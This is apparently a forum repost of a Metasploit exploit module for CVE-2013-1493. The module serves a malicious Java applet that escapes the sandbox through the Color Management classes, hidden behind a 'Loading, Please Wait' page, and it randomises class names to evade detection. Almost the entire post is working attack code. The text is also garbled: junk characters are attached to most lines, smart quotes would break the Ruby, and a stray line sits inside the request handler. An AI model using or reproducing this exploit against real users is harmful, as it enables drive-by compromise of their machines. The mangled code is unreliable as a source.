##( l5 P0 m/ { d5 v ]+ Y
; i! ~; Q5 @' V# o! {6 X9 K! {
# This file is part of the Metasploit Framework and may be subject to
! I( T4 r2 B. w0 l# redistribution and commercial restrictions. Please see the Metasploit
% G; b) u+ `2 ?0 K) W# web site for more information on licensing and terms of use.* n; l! m& X5 i, ?
# http://metasploit.com/
, W4 H4 `1 H2 `: h. d##5 l7 n/ M6 l% J7 \ s* `
require ‘msf/core’
9 ?9 g3 E# `/ E7 t( hrequire ‘rex’4 b3 k$ s2 ]; [6 J& E
class Metasploit3 < Msf::Exploit::Remote) v0 F/ }* ~- o4 R8 I3 \; F0 p
Rank = NormalRanking- H3 V$ m- {4 r+ N. X$ ~
include Msf::Exploit::Remote::HttpServer::HTML
; R4 y3 W' d" A! `include Msf::Exploit::EXE* Z* T: F3 X& s3 u9 ~3 N$ K6 y- O
include Msf::Exploit::Remote::BrowserAutopwn
4 h. _- v! L: cautopwn_info({ :javascript => false })' L9 q" w' G" D4 E9 F7 J
def initialize( info = {} )
$ q4 T$ D7 p& N2 A3 f0 qsuper( update_info( info,
5 J$ ]" B3 x9 B‘Name’ => ‘Java CMM Remote Code Execution’,9 Q2 R: @4 M: P# B! x& H Y
‘Description’ => %q{2 Y P' z3 B5 G3 R7 N! _% b8 _, k: }* Q
This module abuses the Color Management classes from a Java Applet to run
; t8 \! V4 j) E1 g& y* u. qarbitrary Java code outside of the sandbox as exploited in the wild in February1 P$ J# V0 U4 X6 a/ m' r
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
& U* V, C# U7 Yand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1! ~: V6 u y# w, T* W' f; W
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
/ w* j4 G4 U3 j) |warning in order to run the malicious applet.0 N, A, c7 N" g7 E5 K/ v
},
' Z& V1 s/ W; l1 P‘License’ => MSF_LICENSE,
& a: k& L1 ~: s+ O‘Author’ =>
; K/ R; h1 I7 ]3 Q# r'Unknown', # Vulnerability discovery and Exploit P, C3 ^( Z5 I& g1 S% U
'juan vazquez' # Metasploit module (just ported the published exploit)% Y* u! G' C6 D/ b/ I0 r
],
; m# O/ m# ?5 b‘References’ =># f& C) B3 F% n6 V$ p# W4 t
[
, G- o6 s0 s# |4 f" c8 i3 v[ 'CVE', '2013-1493' ],
0 O. J& w# b$ ^7 m+ V[ 'OSVDB', '90737' ],# s- M0 s. }/ A" V9 F) M Y6 ?
[ 'BID', '58238' ],
2 T# v) @# F9 J7 w. h[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],2 o3 F1 I& M1 Q' |' p$ m$ T+ s8 T2 B
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],- |# w3 K4 ~" ?4 p/ V
[ 'URL', 'http://pastie.org/pastes/6581034' ]
) @ c6 D: f& {1 S1 h) h],8 T* q+ C J- R
‘Platform’ => [ 'win', 'java' ],
) H" O: G0 X4 h+ S* F‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },) t4 |9 c5 S' ~$ u
‘Targets’ =>) c$ V2 S. Z. G2 K% d
[* R7 e7 L+ c- W! v
[ 'Generic (Java Payload)',
+ h9 ~8 S- w1 L( a. |{) U- q2 d { ~& A. Y
'Platform' => 'java',
5 Q& Q# r" b! S( W2 v5 V' T'Arch' => ARCH_JAVA
- `( H \% R3 [/ Y}: D4 g: \9 h+ B. e1 P3 X
],
; p* g6 ]) k" Q# K. r$ ^/ P9 d0 @0 I[ 'Windows x86 (Native Payload)',
; ^2 l+ }* |; J{; ^3 d( q! A* r
'Platform' => 'win',+ Q O, W- `4 J! o6 b6 G
'Arch' => ARCH_X86; j9 t- c* ?, D$ E
}
3 U0 \$ X' b, t, j0 W: N, m]" m* Q: W5 Z0 x4 i/ ^5 k
],
" `9 S2 G, u3 G5 T9 q$ r9 a‘‘DisclosureDate’ => ‘Mar 01 2013′
y* D8 O& ^+ q# C))
. }3 ?9 G( R6 B4 s6 B4 ]$ ?% Fend3 y0 N" u u% J
def setup3 J* }3 V9 J) n% u, y* R
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
$ [9 v/ w6 v( o, I$ o@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 P7 h/ P# L- cpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)# K% g- e7 X/ z- W
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
9 Z+ {4 g6 d2 b: x) E1 Vpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”). F, \: f- O3 k% {, m& @9 K4 f" R; \9 d
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
: e" D' _+ O( Y0 ~path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)6 h6 N! }, [/ j- w3 R
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# v$ B. H( F! d$ \1 e {4 M. d9 n% j
@init_class_name = rand_text_alpha(“Init”.length), s* t. W4 r8 @9 r4 d
@init_class.gsub!(“Init”, @init_class_name)
$ y3 r z f! Z% I7 qsuper
# b' m% d5 w' p8 _5 eend% d; E$ I6 f: o8 U) u
def on_request_uri(cli, request): F6 M; r& x( D. h, D; ]. V; J
print_status(“handling request for #{request.uri}”); @- m4 h) L- l H6 F3 o' p0 z
case request.uri9 ?, ]1 M8 [: F N, _( L$ N- f
when /\.jar$/i/ C7 z: E$ T- ?, q
jar = payload.encoded_jar
( e8 e: `# O0 r, B4 [jar.add_file(“#{@init_class_name}.class”, @init_class)( w/ }1 o* P% y6 v
jar.add_file(“Leak.class”, @leak_class)
; o3 F* w- C3 w1 a- Djar.add_file(“MyBufferedImage.class”, @buffered_image_class)( B- ~3 |1 `7 W7 ]# E5 x2 A
jar.add_file(“MyColorSpace.class”, @color_space_class)
4 o) n! V" s9 aDefaultTarget’ => 1,
! Y1 e4 s9 \( f& g! m8 Hmetasploit_str = rand_text_alpha(“metasploit”.length)
1 m! x" q( C6 N7 g7 D( `1 opayload_str = rand_text_alpha(“payload”.length)1 k6 x/ G O( ]" e( B* w
jar.entries.each { |entry|
" p* d. f; X( t! N" u3 V8 z) Lentry.name.gsub!(“metasploit”, metasploit_str)& d0 W n9 ~ r1 Q3 x
entry.name.gsub!(“Payload”, payload_str). E6 o/ n! Z/ |! F) f
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
* d$ v+ W* c: U$ @entry.data = entry.data.gsub(“Payload”, payload_str)/ \; d% W; r! m% N/ T4 a
}
- W/ p5 g' @* ]! Q3 U# B6 N; ajar.build_manifest2 h; h2 F( x6 M" R$ m2 y& G
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
6 U! J1 C" J% J6 s- t& E: I9 R9 J, Z- Zwhen /\/$/2 l4 E/ q' H2 f
payload = regenerate_payload(cli)' q5 `' ^ h! G7 z
if not payload( g3 K% j0 F& F$ Y; d
print_error(“Failed to generate the payload.”)1 N7 J5 c; N* f( y' @ g$ q- N- R! n
send_not_found(cli)
7 p6 h+ ]% {+ w+ ^& vreturn
* b. x" |8 i% `# r7 A9 I+ m3 `end
& T, s" f( e2 P& Usend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })# D2 p6 Q1 u# A6 `3 y! u# l! F0 N
else q9 G. ?& s- ^; k2 f
send_redirect(cli, get_resource() + ‘/’, ”)
5 h: `/ K. a8 K: l# @& G4 ~5 Jend5 o7 |1 X0 I& R* `. H j0 Y
end2 ^$ Y! {& l) n( L4 d" }
def generate_html
# v6 d E( d, l, v0 J) [, Ohtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|1 p) O5 ~( l; \3 }6 P
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|. _( p5 n* \) ]5 N0 H
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
. m- Z6 Z/ i7 r5 z A6 O) ~html += %Q|</applet></body></html>|
1 v4 a; k4 d j* F4 T% L' zreturn html4 T0 ]% q$ V8 \2 [
end
: r l! v6 H# x& _& d( h6 i& Pend
: a8 z7 [) @' O1 Mend1 X$ `* R3 Q, f7 r0 {1 q- `
|
发表于 2013-4-4 17:31:17
收藏
支持
反对